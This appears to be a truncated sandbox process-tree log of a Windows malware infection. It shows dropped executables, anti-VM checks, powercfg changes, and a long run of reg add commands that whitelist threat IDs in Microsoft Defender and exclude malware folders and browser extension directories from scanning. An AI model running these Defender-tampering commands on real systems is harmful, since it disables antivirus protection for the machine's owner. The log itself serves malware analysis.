C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2992

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4088
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:344
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:448
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4480
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4764
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3944
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:2752

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2236

C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe bC /yZzdidB 525403 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4972
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4904
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:2928
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:2020
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:432
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4792
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3548
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1792
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4696
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2856
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:1288
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:3016
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:4640
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:3652
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:448
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:180
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:4136
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1212
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4584
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LUWSYkNLogUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LUWSYkNLogUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RgdiTWAdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RgdiTWAdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLLzADClkagU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLLzADClkagU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wGxkUGMqSkfBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wGxkUGMqSkfBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KTrRWZTJHHaefVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KTrRWZTJHHaefVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3352
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4512
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RgdiTWAdU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RgdiTWAdU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLLzADClkagU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLLzADClkagU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wGxkUGMqSkfBC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wGxkUGMqSkfBC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KTrRWZTJHHaefVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KTrRWZTJHHaefVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTXlTkGoDPQchyzd /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\reg.exe
